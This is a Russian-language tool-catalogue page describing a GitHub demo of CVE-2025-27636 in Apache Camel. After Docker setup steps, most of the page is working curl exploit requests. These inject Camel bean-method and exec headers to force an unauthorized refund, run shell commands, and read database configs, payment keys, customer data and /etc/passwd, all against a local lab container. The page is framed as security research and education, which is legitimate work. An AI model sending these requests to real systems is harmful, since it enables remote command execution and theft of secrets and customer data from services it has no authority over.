Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-27636-demo — Демонстрирует CVE-2025-27636 в Apache Camel с воспроизведением атак с инъекцией заголовков на основе Docker, включая инъекцию методов бинов и выполнение команд для исследований и обучения в области безопасности. | Kitploit
Инструменты/GitHubGitHub/crystallen1/cve-2025-27636-demo
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubcrystallen1/cve-2025-27636-demo

CVE-2025-27636-demo

Демонстрирует CVE-2025-27636 в Apache Camel с воспроизведением атак с инъекцией заголовков на основе Docker, включая инъекцию методов бинов и выполнение команд для исследований и обучения в области безопасности.

Репозиторий
10 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Демонстрация CVE в Apache Camel

Этот проект демонстрирует уязвимости безопасности в Apache Camel, связанные с атаками путём внедрения заголовков.

Сборка Docker

Соберите Docker-образ:

root@kitploit:~
docker build -t camel-cve-demo .

Запуск Docker

Запустите контейнер со всеми необходимыми портами:

root@kitploit:~
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo

Воспроизведение атаки

1. Атака внедрением метода Bean

Эксплуатируйте уязвимую конечную точку, внедряя имена методов:

root@kitploit:~
# Успешная атака - заголовок с учётом регистра
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Альтернатива - внедрение через параметр запроса
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"

Сравнение (эти запросы должны завершиться неудачей):

root@kitploit:~
# Неверный регистр - не должно работать
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

2. Атака выполнением команд

Эксплуатируйте компонент exec для выполнения произвольных команд:

Разведка:

root@kitploit:~
# Проверка текущей директории
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# Просмотр содержимого директории конфигурации
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Поиск файлов конфигурации
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"

Эксфильтрация данных:

root@kitploit:~
# Чтение конфигурации базы данных
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Чтение платёжных секретов
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Чтение данных клиентов
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# Чтение журналов аудита
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# Чтение системных пользователей
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# Список процессов
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"

Проверка результатов атаки

Проверьте журналы атак внутри контейнера:

root@kitploit:~

# Просмотр попыток несанкционированного возврата средств
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt

Порты

  • 8080: Основное приложение (интерфейс)
  • 8081: Конечная точка, уязвимая к внедрению Bean
  • 8484: Конечная точка, уязвимая к внедрению exec
Скачать инструмент